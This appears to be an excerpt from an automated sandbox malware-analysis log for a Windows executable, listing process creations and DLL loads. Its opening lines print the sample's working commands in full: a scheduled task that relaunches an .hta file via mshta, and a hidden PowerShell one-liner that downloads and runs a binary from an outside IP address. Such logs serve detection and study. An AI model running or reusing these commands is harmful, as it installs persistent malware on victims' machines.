Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
